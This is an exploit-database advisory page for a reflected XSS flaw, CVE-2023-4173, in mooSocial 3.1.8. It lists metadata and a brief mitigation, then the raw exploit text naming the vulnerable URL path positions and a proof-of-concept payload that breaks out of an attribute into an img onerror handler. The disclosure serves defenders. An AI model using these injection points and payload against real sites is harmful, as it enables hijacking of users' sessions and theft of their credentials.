header-logo
Suggest Exploit
vendor:
mooSocial
by:
CraCkEr
6.1
CVSS
MEDIUM
Reflected XSS
79
CWE
Product Name: mooSocial
Affected Version From: 3.1.2008
Affected Version To: 3.1.2008
Patch Exists: NO
Related CWE: CVE-2023-4173
CPE: a:moosocial:moosocial:3.1.8
Metasploit:
Other Scripts:
Tags: cve,cve2023,moosocial,xss
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'verified': True, 'fofa-query': 'mooSocial'}
Platforms Tested: Windows 10 Pro
2023

mooSocial 3.1.8 – Reflected XSS

The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials

Mitigation:

Implement input validation and output encoding to prevent XSS attacks
Source

Exploit-DB raw data:

# Exploit Title: mooSocial 3.1.8 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 28/07/2023
# Vendor: mooSocial
# Vendor Homepage: https://moosocial.com/
# Software Link: https://travel.moosocial.com/
# Version: 3.1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4173


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials



URL path folder is vulnerable to XSS

https://website/classifieds[XSS]/search?category=1

https://website/classifieds/search[XSS]?category=1


XSS Payloads:

ijz3y"><img src=a onerror=alert(1)>y4apk


[-] Done